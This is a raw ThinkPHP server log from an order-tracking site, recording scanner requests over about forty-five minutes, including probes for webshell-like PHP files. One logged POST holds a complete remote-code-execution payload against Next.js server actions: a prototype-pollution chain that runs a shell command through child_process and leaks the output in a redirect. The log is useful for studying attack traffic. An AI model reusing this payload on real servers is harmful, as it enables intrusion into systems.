[ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001586s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:06:47+08:00 ] 141.98.11.140 GET / [ info ] 47.105.33.115:80/ [运行时间:0.035367s][吞吐率:28.27req/s] [内存消耗:3,332.04kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000065s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001547s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001943s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:10:15+08:00 ] 198.235.24.53 GET /.well-known/security.txt [ info ] www.clcoa.com/.well-known/security.txt [运行时间:0.021146s][吞吐率:47.29req/s] [内存消耗:2,225.06kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.well-known', 1 => 'security.txt', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', 'user-agent' => 'Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:01+08:00 ] 148.153.56.58 GET /DZXf [ info ] 47.105.33.115:80/DZXf [运行时间:0.019079s][吞吐率:52.41req/s] [内存消耗:2,225.73kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001112s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'DZXf', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:05+08:00 ] 148.153.56.58 GET /2tTc [ info ] 47.105.33.115:80/2tTc [运行时间:0.020284s][吞吐率:49.30req/s] [内存消耗:2,225.73kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001209s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '2tTc', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:09+08:00 ] 148.153.56.58 GET /aab8 [ info ] 47.105.33.115:80/aab8 [运行时间:0.026322s][吞吐率:37.99req/s] [内存消耗:2,225.73kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001257s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'aab8', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:10+08:00 ] 148.153.56.58 GET /jquery-3.3.1.slim.min.js [ info ] 47.105.33.115:80/jquery-3.3.1.slim.min.js [运行时间:0.019096s][吞吐率:52.37req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'jquery-3.3.1.slim.min.js', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:10+08:00 ] 148.153.56.58 GET /aab9 [ info ] 47.105.33.115:80/aab9 [运行时间:0.020189s][吞吐率:49.53req/s] [内存消耗:2,225.73kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001275s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'aab9', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:12:11+08:00 ] 148.153.56.58 GET /jquery-3.3.2.slim.min.js [ info ] 47.105.33.115:80/jquery-3.3.2.slim.min.js [运行时间:0.020121s][吞吐率:49.70req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001163s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'jquery-3.3.2.slim.min.js', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:14:55+08:00 ] 43.158.91.71 GET / [ info ] 47.105.33.115:80/ [运行时间:0.027155s][吞吐率:36.83req/s] [内存消耗:3,335.34kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control' => 'no-cache', 'connection' => 'keep-alive, close', 'pragma' => 'no-cache', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001507s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:19:59+08:00 ] 91.224.92.55 OPTIONS / [ info ] 47.105.33.115:80/ [运行时间:0.026553s][吞吐率:37.66req/s] [内存消耗:3,333.91kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001451s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:20:04+08:00 ] 89.42.231.244 GET /SDK/webLanguage [ info ] 47.105.33.115:80/SDK/webLanguage [运行时间:0.020218s][吞吐率:49.46req/s] [内存消耗:2,207.57kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001283s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'SDK', 1 => 'webLanguage', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46', 'accept-encoding' => 'gzip, deflate, gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'x-requested-with' => 'XMLHttpRequest', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'en US,en;q=0.9,sv;q=0.8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:25:20+08:00 ] 141.98.11.140 GET /login.asp [ info ] 47.105.33.115:443/login.asp [运行时间:0.021256s][吞吐率:47.05req/s] [内存消耗:2,228.06kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001340s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'login.asp', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0', 'accept' => 'text/html', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:33:30+08:00 ] 204.76.203.18 GET / [ info ] 47.105.33.115:80/ [运行时间:0.030885s][吞吐率:32.38req/s] [内存消耗:3,332.04kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001235s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001571s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:40:49+08:00 ] 121.204.158.132 GET / [ info ] 47.105.33.115/ [运行时间:0.028913s][吞吐率:34.59req/s] [内存消耗:3,332.76kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001548s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:41:17+08:00 ] 20.193.140.236 POST / [ info ] www.clcoa.com/ [运行时间:0.050661s][吞吐率:19.74req/s] [内存消耗:4,790.09kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001454s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'identity', 'content-length' => '730', 'host' => 'www.clcoa.com', 'next-action' => 'x', 'x-nextjs-request-id' => '83a0ed93', 'x-nextjs-html-request-id' => 'd0d6c93fcdee876e43b8', 'content-type' => 'multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'connection' => 'close', ) [ info ] [ PARAM ] array ( 0 => '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'id\').toString().trim().replace(/\\\\n/g, \' | \');;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}', 1 => '"$@0"', 2 => '[]', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001732s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.017692s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000409s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000992s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"1\":\"\\\"$@0\\\"\",\"2\":\"[]\"}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , '20.193.140.236' , 1765708877) [ RunTime:0.005212s ] --------------------------------------------------------------- [ 2025-12-14T18:50:15+08:00 ] 32.120.191.52 GET /wp-good.php [ info ] clcoa.com/wp-good.php [运行时间:0.019514s][吞吐率:51.25req/s] [内存消耗:2,208.27kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001256s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-good.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '32.120.191.52', 'x-real-ip' => '32.120.191.52', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:15+08:00 ] 17.149.153.113 GET /ioxi-o.php [ info ] clcoa.com/ioxi-o.php [运行时间:0.019805s][吞吐率:50.49req/s] [内存消耗:2,208.28kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ioxi-o.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '17.149.153.113', 'x-real-ip' => '17.149.153.113', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:15+08:00 ] 111.7.73.235 GET /file.php [ info ] clcoa.com/file.php [运行时间:0.020848s][吞吐率:47.97req/s] [内存消耗:2,208.28kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'file.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.yahoo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '111.7.73.235', 'x-real-ip' => '111.7.73.235', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:15+08:00 ] 66.20.115.245 GET /wp-admin/css/colors/blue [ info ] clcoa.com/wp-admin/css/colors/blue [运行时间:0.021618s][吞吐率:46.26req/s] [内存消耗:2,208.23kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'css', 2 => 'colors', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '66.20.115.245', 'x-real-ip' => '66.20.115.245', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:15+08:00 ] 255.50.9.107 GET /wp-signin.php [ info ] clcoa.com/wp-signin.php [运行时间:0.018643s][吞吐率:53.64req/s] [内存消耗:2,207.96kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-signin.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '255.50.9.107', 'x-real-ip' => '255.50.9.107', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 132.227.96.118 GET /abcd.php [ info ] clcoa.com/abcd.php [运行时间:0.020037s][吞吐率:49.91req/s] [内存消耗:2,208.16kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001185s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'abcd.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '132.227.96.118', 'x-real-ip' => '132.227.96.118', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 141.220.130.26 GET /wp-includes/block-bindings [ info ] clcoa.com/wp-includes/block-bindings [运行时间:0.019716s][吞吐率:50.72req/s] [内存消耗:2,208.34kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'block-bindings', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '141.220.130.26', 'x-real-ip' => '141.220.130.26', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 144.218.0.8 GET /about.php [ info ] clcoa.com/about.php [运行时间:0.020049s][吞吐率:49.88req/s] [内存消耗:2,208.27kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'about.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '144.218.0.8', 